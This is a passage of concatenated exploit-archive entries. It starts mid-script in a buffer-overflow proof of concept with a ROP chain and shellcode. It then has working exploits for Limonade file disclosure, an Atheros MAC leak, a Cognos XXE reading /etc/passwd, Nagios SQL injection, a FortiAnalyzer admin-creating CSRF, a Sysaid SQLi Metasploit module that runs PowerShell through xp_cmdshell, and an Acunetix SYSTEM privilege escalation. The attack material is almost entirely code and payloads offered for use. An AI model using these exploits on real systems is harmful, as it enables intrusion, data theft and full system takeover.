0x61c18d81, # XCHG EAX,EDI # RETN [sqlite3.dll]
0x1001d626, # XOR ESI,ESI # RETN [ImageLoad.dll]
0x10021a3e, # ADD ESI,EDI # RETN 0x00 [ImageLoad.dll]
0x10013ad6, # POP EBP # RETN [ImageLoad.dll]
0x61c227fa, # & push esp # ret [sqlite3.dll]
0x10022c4c, # XOR EDX,EDX # RETN [ImageLoad.dll]
# Now bunch of ugly increments... unfortunately couldn't find anything nicer :(
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x1001b4f6, # POP ECX # RETN [ImageLoad.dll]
0x61c73281, # &Writable location [sqlite3.dll]
0x100194b3, # POP EDI # RETN [ImageLoad.dll]
0x1001a858, # RETN (ROP NOP) [ImageLoad.dll]
0x10015442, # POP EAX # RETN [ImageLoad.dll]
0x90909090, # nop
0x100240c2, # PUSHAD # RETN [ImageLoad.dll]
]
return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
# Check command line args
if len(sys.argv) <= 1:
print "Usage: python poc.py [host] [port]"
exit()
host = sys.argv[1]
port = int(sys.argv[2])
# Offsets
rop_offset = 2455
max_size = 5000
seh_offset = 4059
eax_offset = 4183
# move ESP out of the way so the shellcode doesn't corrupt itself during execution
# metasm > add esp,-1500
shellcode = "\x81\xc4\x24\xfa\xff\xff"
# Just as a PoC, spawn calc.exe. Replace with any other shellcode you want
# (maximum size of shellcode allowed: 1260 bytes)
#
# msfvenom -p windows/exec CMD=calc.exe -b '\x00\x3b' -f python
# Payload size: 220 bytes
shellcode += "\xbb\xde\x37\x73\xe9\xdb\xdf\xd9\x74\x24\xf4\x58\x31"
shellcode += "\xc9\xb1\x31\x31\x58\x13\x83\xe8\xfc\x03\x58\xd1\xd5"
shellcode += "\x86\x15\x05\x9b\x69\xe6\xd5\xfc\xe0\x03\xe4\x3c\x96"
shellcode += "\x40\x56\x8d\xdc\x05\x5a\x66\xb0\xbd\xe9\x0a\x1d\xb1"
shellcode += "\x5a\xa0\x7b\xfc\x5b\x99\xb8\x9f\xdf\xe0\xec\x7f\xde"
shellcode += "\x2a\xe1\x7e\x27\x56\x08\xd2\xf0\x1c\xbf\xc3\x75\x68"
shellcode += "\x7c\x6f\xc5\x7c\x04\x8c\x9d\x7f\x25\x03\x96\xd9\xe5"
shellcode += "\xa5\x7b\x52\xac\xbd\x98\x5f\x66\x35\x6a\x2b\x79\x9f"
shellcode += "\xa3\xd4\xd6\xde\x0c\x27\x26\x26\xaa\xd8\x5d\x5e\xc9"
shellcode += "\x65\x66\xa5\xb0\xb1\xe3\x3e\x12\x31\x53\x9b\xa3\x96"
shellcode += "\x02\x68\xaf\x53\x40\x36\xb3\x62\x85\x4c\xcf\xef\x28"
shellcode += "\x83\x46\xab\x0e\x07\x03\x6f\x2e\x1e\xe9\xde\x4f\x40"
shellcode += "\x52\xbe\xf5\x0a\x7e\xab\x87\x50\x14\x2a\x15\xef\x5a"
shellcode += "\x2c\x25\xf0\xca\x45\x14\x7b\x85\x12\xa9\xae\xe2\xed"
shellcode += "\xe3\xf3\x42\x66\xaa\x61\xd7\xeb\x4d\x5c\x1b\x12\xce"
shellcode += "\x55\xe3\xe1\xce\x1f\xe6\xae\x48\xf3\x9a\xbf\x3c\xf3"
shellcode += "\x09\xbf\x14\x90\xcc\x53\xf4\x79\x6b\xd4\x9f\x85"
buffer = "A" * rop_offset # padding
buffer += create_rop_chain()
buffer += shellcode
buffer += "A" * (seh_offset - len(buffer)) # padding
buffer += "BBBB" # overwrite nSEH pointer
buffer += struct.pack("<I", 0x1002280a) # overwrite SEH record with stack pivot (ADD ESP,1004 # RETN [ImageLoad.dll])
buffer += "A" * (eax_offset - len(buffer)) # padding
buffer += struct.pack("<I", 0xffffffff) # overwrite EAX to always trigger an exception
buffer += "A" * (max_size - len(buffer)) # padding
httpreq = (
"GET /changeuser.ghp HTTP/1.1\r\n"
"User-Agent: Mozilla/4.0\r\n"
"Host:" + host + ":" + str(port) + "\r\n"
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
"Accept-Language: en-us\r\n"
"Accept-Encoding: gzip, deflate\r\n"
"Referer: http://" + host + "/\r\n"
"Cookie: SESSIONID=6771; UserID=" + buffer + "; PassWD=;\r\n"
"Conection: Keep-Alive\r\n\r\n"
)
# Send payload to the server
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(httpreq)
s.close()
source: https://www.securityfocus.com/bid/63771/info
Limonade framework is prone to a local file-disclosure vulnerability because it fails to sanitize user-supplied input.
An attacker may leverage this issue to obtain sensitive information from local files on computers running the vulnerable application. This may aid in further attacks.
Limonade framework 3.0 vulnerable; other versions may also be affected.
<?php
/** To prevent of time out **/
set_time_limit(0);
/** Error reporting **/
error_reporting(0);
/** Necessary variables **/
$url = $argv[1];
$data = $argv[2];
$needle = $argv[3];
/** Curl function with appropriate adjustments **/
function CurlPost($url='localhost',$data=array())
{
$ch = curl_init();
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,FALSE);
curl_setopt($ch,CURLOPT_SSL_VERIFYHOST,2);
curl_setopt($ch,CURLOPT_HEADER,1);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_TIMEOUT,50);
curl_setopt($ch,CURLOPT_POST,true);
curl_setopt($ch,CURLOPT_POSTFIELDS,$data);
return curl_exec($ch);
curl_close($ch);
}
list($param,$file) = explode(':',$data);
$FilterBypassing = '....//';
for($i=0;$i<10;$i++)
{
$DataToPost[$param] = $FilterBypassing.$file;
$response = CurlPost($url,$DataToPost);
if(strstr($response,$needle)!==FALSE)
{
echo $response;
echo "\n\nExploited successfully!\n";
echo 'Payload: ',$DataToPost[$param],"\n\n\n";
die();
}
$FilterBypassing .= '....//';
}
?>
source: https://www.securityfocus.com/bid/63743/info
Linux Kernel is prone to an information-disclosure vulnerability.
An attacker can exploit this issue to obtain sensitive information like original MAC address; information obtained may aid in other attacks.
Note: This BID was previously titled 'Atheros Wireless Drivers MAC Address Information Disclosure Vulnerability'. The title and technical details have been changed to better reflect the underlying component affected.
#!/usr/bin/python
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
import random
# number of times to inject probe for one bit (combat packet loss)
ATTEMPTS_PER_BIT = 6
# time to wait for ACK in seconds
SNIFFTIME = 0.3
def randmac():
mac = [0] * 6
for i in xrange(6):
mac[i] = random.randint(0, 256)
# avoid multicast/broadcast mac
mac[0] = mac[0] & 0xFE
return ":".join([format(byte, '02x') for byte in mac])
def parsemac(macstr):
parts = macstr.replace("-", ":").split(":")
if len(parts) != 6:
raise ValueError("MAC does not consist of 6 parts (separated by : or -)")
return [int(byte, 16) for byte in parts]
def is_ack(p):
return Dot11 in p and p.type == 1 and p.subtype == 13
def find_fixed_bits(s, mac):
# eventually contains the real MAC address
orgmac = [0] * 6
# random MAC address, used as sender, to which the target will send an ACK
srcmac = randmac()
# for all the bits - FIXME: Don't consider H.O. bit of first MAC byte
for i in range(6):
for bit in range(8):
# flip the bit at current position
currbit = mac[i] & (1 << bit)
mac[i] ^= (1 << bit)
# convert modified mac to string
strmac = ":".join([format(byte, '02x') for byte in mac])
print "Probing", strmac, "...",
replied = False
for attempt in range(ATTEMPTS_PER_BIT):
# inject data packet to modified MAC address
packet = Dot11(type="Data", subtype=4, FCfield="from-DS",
addr1=strmac, addr2=srcmac, addr3=strmac)
s.send(RadioTap()/packet)
# Sniff air for ACK to modified MAC
l = sniff(lfilter=lambda p: is_ack(p) and p.addr1 == srcmac, count=1,
timeout=SNIFFTIME, opened_socket=s)
# We we got an ACK, don't need to try again
if len(l) == 1:
replied = True
break
print replied
# If client replied, original bit is different from the one currently set,
# otherwise it's equal to original bit.
if replied:
orgmac[i] |= (~currbit) & (1 << bit)
else:
orgmac[i] |= currbit
# flip bit back to original value
mac[i] ^= (1 << bit)
# Done, return original MAC
return orgmac
if __name__ == "__main__":
if len(sys.argv) != 3:
print "Usage:", sys.argv[0], "interface macaddr"
quit(1)
try:
mac = parsemac(sys.argv[2])
conf.iface = sys.argv[1]
random.seed()
# Open up read/write socket so we don't miss the ACK
L2socket = conf.L2socket
s = L2socket(type=ETH_P_ALL, iface=conf.iface)
# Now find the MAC
orgmac = find_fixed_bits(s, mac)
s.close()
print "\nReal MAC address:", ":".join(format(byte, "02x") for byte in orgmac), "\n"
except ValueError, e:
print "Invalid MAC address:", e
except socket.error, e:
print "Error with provided interface:", e
source: https://www.securityfocus.com/bid/63719/info
IBM Cognos Business Intelligence is prone to an information-disclosure vulnerability due to an error when parsing XML external entities.
An attacker can exploit this issue to gain access to sensitive information; this may lead to further attacks.
IBM Cognos Business Intelligence 10.2.1 and prior are vulnerable.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ELEMENT comments ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" > ]>
<ob:Openbravo xmlns:ob="http://www.example.com"
xmlns:xsi="http://www.example1.com/2001/XMLSchema-instance">
<Product id="C970393BDF6C43E2B030D23482D88EED" identifier="Zumo de Piñ,5L">
<id>C970393BDF6C43E2B030D23482D88EED</id>
<comments>&xxe;</comments>
</Product>
</ob:Openbravo>
source: https://www.securityfocus.com/bid/63754/info
Nagios XI is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Versions prior to Nagios XI 2012R2.4 are vulnerable.
POST /nagiosql/index.php HTTP/1.1
Host: localhost
Content-Length: 69
Origin: http://locahost
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.76
Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost/nagiosql/
Cookie: PHPSESSID=httj04vv2g028sbs73v9dqoqs3
tfUsername=test&tfPassword=%27%29+OR+1%3D1+limit+1%3B--+&Submit=Login
source: https://www.securityfocus.com/bid/63663/info
FortiAnalyzer is prone to a cross-site request-forgery vulnerability because it fails to properly validate HTTP requests.
Exploiting this issue may allow a remote attacker to perform certain unauthorized administrative actions in the context of the device running the affected application. Other attacks are also possible.
Versions prior to Fortianalyzer 4.3.7 and 5.0.5 are vulnerable.
<html>
<body onload="CSRF.submit();">
<html>
<body onload="CSRF.submit();">
<form id="csrf"
action="https://www.example.com/IP_Fortianalyzer/cgi-bin/module//sysmanager/admin/SYSAdminUserDialog";
method="post" name="CSRF">
<input name="userId" value="user.via.cfsr"> </input>
<input name="type" value="0"> </input>
<input name="rserver" value=""> </input>
<input name="lserver" value=""> </input>
<input name="subject" value=""> </input>
<input name="cacerts" value="Fortinet_CA2"> </input>
<input name="password" value="123456"> </input>
<input name="password_updated" value="1"> </input>
<input name="confirm_pwd" value="123456"> </input>
<input name="confirm_pwd_updated" value="1"> </input>
<input name="host_1" value="0.0.0.0/0.0.0.0"> </input>
<input name="host_2" value="255.255.255.255/255.255.255.255"> </input>
<input name="host_3" value="255.255.255.255/255.255.255.255"> </input>
<input name="host_4" value="255.255.255.255/255.255.255.255"> </input>
<input name="host_5" value="255.255.255.255/255.255.255.255"> </input>
<input name="host_6" value="255.255.255.255/255.255.255.255"> </input>
<input name="host_7" value="255.255.255.255/255.255.255.255"> </input>
<input name="host_8" value="255.255.255.255/255.255.255.255"> </input>
<input name="host_9" value="255.255.255.255/255.255.255.255"> </input>
<input name="host_10" value="255.255.255.255/255.255.255.255"> </input>
<input name="host6_1"
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>
<input name="host6_2"
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>
<input name="host6_3"
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>
<input name="host6_4"
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>
<input name="host6_5"
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>
<input name="host6_6"
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>
<input name="host6_7"
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>
<input name="host6_8"
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>
<input name="host6_9"
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>
<input name="host6_10"
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>
<input name="profile" value="Super_User"> </input>
<input name="alladomRDGrp" value="0"> </input>
<input name="_adom" value=""> </input>
<input name="allpackRDGrp" value="0"> </input>
<input name="_adom" value=""> </input>
<input name="allpackRDGrp" value="0"> </input>
<input name="_pack" value=""> </input>
<input name="desc" value=""> </input>
<input name="showForce" value="0"> </input>
<input name="numhosts" value="0"> </input>
<input name="numhosts6" value="3"> </input>
<input name="_comp_8" value="OK"> </input>
<input name="actionevent" value="new"> </input>
<input name="profileId" value=""> </input>
<input name="mgt" value=""> </input>
<input name="dashboard" value=""> </input>
<input name="dashboardmodal" value=""> </input>
<input name="csrf_token" value=""> </input>
</form>
</body>
</html>
# Exploit Title: Sysaid Helpdesk Software Unauthenticated SQLi
# Date: 28.11.2015
# Exploit Author: hland
# Vendor Homepage: https://www.sysaid.com/
# Version: v14.4.32 b25
# Tested on: Windows 7, Windows 10
# Blog post: http://blog.blankhat.pw/2015/09/unauthenticated-sql-injection-in-sysaid.html
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/exploit/powershell'
require 'msf/core/exploit/mssql_commands'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Powershell
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "Sysaid Helpdesk Software Unauthenticated SQLi",
'Description' => %q{
This module exploits an unauthenticated SQLi vulnerability in the Sysaid
Helpdesk Free software. Because the "menu" parameter is not handled correctly,
a malicious user can manipulate the SQL query, and allows
arbitrary code execution under the context of 'SYSTEM' because the database
runs as the SA user. This module uses a Metasploit generated Powershell payload and
uses xp_cmdshell, which is activated and then deactivated after exploitation.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Hland',
],
'References' =>
[
['CVE', 'xxxx'],
],
'Payload' =>
{
'BadChars' => "\x00"
},
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'migrate -f'
},
'Platform' => 'win',
'Targets' =>
[
['Sysaid Helpdesk <= v14.4.32 b25', {}]
],
'Privileged' => false,
'DisclosureDate' => "Aug 29 2015",
'DefaultTarget' => 0,
))
register_options(
[
OptPort.new('RPORT', [true, "The web application's port", 8080]),
OptString.new('TARGETURI', [true, 'The base path to to the web application', '/'])
], self.class)
end
def check
peer = "#{rhost}:#{rport}"
uri = target_uri.path
uri = normalize_uri(uri,"Login.jsp")
print_status("#{peer} - Checking for vulnerability")
res = send_request_cgi({
'method' => 'GET',
'uri' => uri,
'vars_get' => {
}
})
v = res.body.scan(/\<title\>SysAid Help Desk Software\<\/title\>/)
if not v
vprint_error("Is this even a Sysaid Help Desk?")
return Exploit::CheckCode::Safe
else
vprint_status("Identified system as Sysaid Help Desk")
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Unknown
end
def mssql_xpcmdshell(cmd,doprint=false,opts={})
force_enable = false
begin
res = mssql_query("EXEC master..xp_cmdshell '#{cmd}'", doprint)
#mssql_print_reply(res) if doprint
return res
rescue RuntimeError => e
if(e.to_s =~ /xp_cmdshell disabled/)
force_enable = true
retry
end
raise e
end
end
def exploit
peer = "#{rhost}:#{rport}"
uri = target_uri.path
vprint_line("#{peer} - Getting a session token...")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, "Login.jsp"),
'vars_get' => {
}
})
vprint_line("#{peer} - Cookie's in the jar...")
# Got a cookie, now ready to make exploiting requests
if res && res.code == 200
#vprint_line("#{res.headers}")
cookies = res.get_cookies
#vprint_line("#{cmd_psh_payload(payload.encoded, payload_instance.arch.first)}")
else
vprint_line("No 200 response? I'm outta here")
return
end
# Put together the vulnerable URI
uri = normalize_uri(uri,"api","v1","menu","menu_items")
# Generate powershell payload as an encoded string
powershell_payload = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {:encode_final_payload => true, :remove_comspec => true})
#
# Inject payload and wait for shell
#
print_status("#{peer} - Trying to activate xp_cmdshell and exploit vulnerability")
sqli = "main';exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;EXEC master..xp_cmdshell '#{powershell_payload}';--"
res = send_request_cgi({
'method' => 'GET',
'uri' => uri,
'cookie' => cookies,
'vars_get' => {
'menu' => sqli,
}
})
# Deactivate XPCmdShell
sqli = "main';exec sp_configure 'xp_cmdshell', 0 ;RECONFIGURE;exec sp_configure 'show advanced options', 0 ;RECONFIGURE;--"
print_status("#{peer} - Deactivating xp_cmdshell to clean up after ourselves..")
res = send_request_cgi({
'method' => 'GET',
'uri' => uri,
'cookie' => cookies,
'vars_get' => {
'menu' => sqli,
}
})
end
end
source: https://www.securityfocus.com/bid/63814/info
nginx is prone to a remote security-bypass vulnerability.
An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions.
nginx 0.8.41 through 1.5.6 are vulnerable.
The following example data is available:
/file \0.php
source: https://www.securityfocus.com/bid/63805/info
SKIDATA Freemotion.Gate is prone to multiple remote command-execution vulnerabilities.
Attackers can exploit these issues to execute arbitrary commands in the context of the affected system.
SKIDATA Freemotion.Gate 4.1.3.5 is vulnerable; other versions may also be affected.
curl -X POST --header "Content-Type:text/xml" --data-binary @manual-release.raw http://www.example.com:7777/skidata/hessian/CP > /dev/null 2>&1
source: https://www.securityfocus.com/bid/63800/info
The Blue Wrench Video Widget plugin for WordPress is prone to a cross-site request-forgery vulnerability.
An attacker can exploit the cross-site request forgery issue to perform unauthorized actions in the context of a logged-in user of the affected application. This may aid in other attacks.
Blue Wrench Video Widget 1.0.2 is vulnerable; other versions may also be affected.
<form id=.upload-form.
action=.http://www.example1.com/wordpress/wp-admin/admin.php?page=bw-videos.
method=.post.>
<table class=.form-table.>
<tbody>
<tr valign=.top.>
<th scope=.row.>Title</th>
<td><input id=.bw_title. type=.text. maxlength=.75. name=.bw_title.
size=.70. value=.http://www.example2.com/code/evil.js. />
</tr>
<tr valign=.top .>
<th scope=.row.>URL</th>
<td><input id=.bw_url. type=.text. maxlength=.75. name=.bw_url.
size=.70. value=.http://www.example2.com/code/evil.js. />
</td>
</tr>
</tbody>
</table>
</form>
'''
========================================================================
Acunetix WVS 10 - from guest to Sytem (Local privilege escalation)
CVE: CVE-2015-4027
Author: (me) Daniele Linguaglossa
Affected Product: Acunetix WVS 10
Exploit: Local privilege escalation
Vendor: Acunetix ltd
Remote: No
Version: 10
=========================================================================
A local privilege escalation exists in Acunetix WVS 10, it allow
a local user (even guest) to gain same privilege as System user.
With default Acunetix installation, a service called "AcuWVSSchedulerv10"
will be installed, this service run as local system user.
AcuWVSSchedulerv10 is reponsable for scan scheduling without user interaction
it expose some API to interact via a web server usually localhost:8183.
API:
/listScan
/addScan <== vulnerable one
/deleteScan
etc...
When a user schedule a scan API "addScan" will be called as following
-------------------------------------------------------------------------------
POST /api/addScan HTTP/1.1
Host: localhost:8183
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json; charset=UTF-8
RequestValidated: true
X-Requested-With: XMLHttpRequest
Referer: http://localhost:8183/
Content-Length: 452
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
{
"scanType": "scan",
"targetList": "",
"target": ["http://.target.it"],
"recurse": "-1",
"date": "12/2/2015",
"dayOfWeek": "1",
"dayOfMonth": "1",
"time": "12:21",
"deleteAfterCompletion": "False",
"params": {
"profile": "Default",
"loginSeq": "<none>",
"settings": "Default",
"scanningmode": "heuristic",
"excludedhours": "<none>",
"savetodatabase": "True",
"savelogs": "False",
"generatereport": "False",
"reportformat": "PDF",
"reporttemplate": "WVSAffectedItemsReport.rep",
"emailaddress": ""
}
}
------------------------------------------------------------------------------
The first thing i noticed was the reporttemplate, this was used to create report
when scanning ends, so it means an external file wich we can control will be then
used by System! this would be interesting enough but i never look deep into.
Instead i noticed something even worst, filename was used as argument to wvs.exe
called with system privilege!
By looking at how Acunetix handled reporttemplate argument i figured out that was
possibile to inject custom arguments within reporttemplate, now this is where
Acunetix help us :D in fact wvs was provided with an interesting argument it was
/Run as reference says:
https://www.acunetix.com/blog/docs/acunetix-wvs-cli-operation/
Run a command line command during the crawl.
Syntax: /Run [command]
Example: /Run curl http://example.com/dir1/
Wow that's really nice, so in order to execute a command we must insert a fake
Crawl followed by a Run command so reporttemplate become:
"reporttemplate": "WVSAffectedItemsReport.rep /Craw http://fakesite.it /Run cmd.exe"
it worked cmd runned as System!
==================================================================================
Now let's pwn this!
escalation.py
'''
import httplib
import json
from datetime import datetime
import sys
from time import gmtime, strftime
COMMAND = sys.argv[1] if len(sys.argv) > 1 else "cmd.exe"
ACUHOST = '127.0.0.1'
ACUPORT = 8183
ACUHEADERS = {
"Content-Type": "application/json; charset=UTF-8",
"X-Requested-With": "XMLHttpRequest",
"Accept": "application/json, text/javascript, */*; q=0.01",
"RequestValidated": "true"
}
ACUEXPLOIT = "/Crawl http://www.google.it /Run \""+ COMMAND + "\""
ACUDATA = {"scanType":"scan",
"targetList":"",
"target":["http://"+"A"*2048],
"recurse":"-1",
"date":strftime("%m/%d/%Y", gmtime()),
"dayOfWeek":"1",
"dayOfMonth":"1",
"time": "%s:%s" % (datetime.now().hour, datetime.now().minute+1),
"deleteAfterCompletion":"False",
"params":{"profile":"Default",
"loginSeq":"<none>",
"settings":"Default",
"scanningmode":"heuristic",
"excludedhours":"<none>",
"savetodatabase":"True",
"savelogs":"False",
"generatereport":"False",
"reportformat":"PDF",
"reporttemplate":"WVSDeveloperReport.rep " + ACUEXPLOIT,
"emailaddress":""}
}
def sendExploit():
conn = httplib.HTTPConnection(ACUHOST, ACUPORT)
conn.request("POST", "/api/addScan", json.dumps(ACUDATA), ACUHEADERS)
resp = conn.getresponse()
return "%s %s" % (resp.status, resp.reason)
print "Acunetix Wvs 10 Local priviledge escalation by Daniele Linguaglossa\n"
print "[+] Command : %s will be executed as SYSTEM" % COMMAND
print "[+] Sending exploit..."
print "[+] Result: "+sendExploit()
print "[+] Done!"
'''
============================================================================
I hope this write-up was funny enough anyway i really would like to thank
Acunetix product manager N.S. for the really fast answer and bug mitigation,
right now a patch exists so hurry up download it now.
============================================================================
'''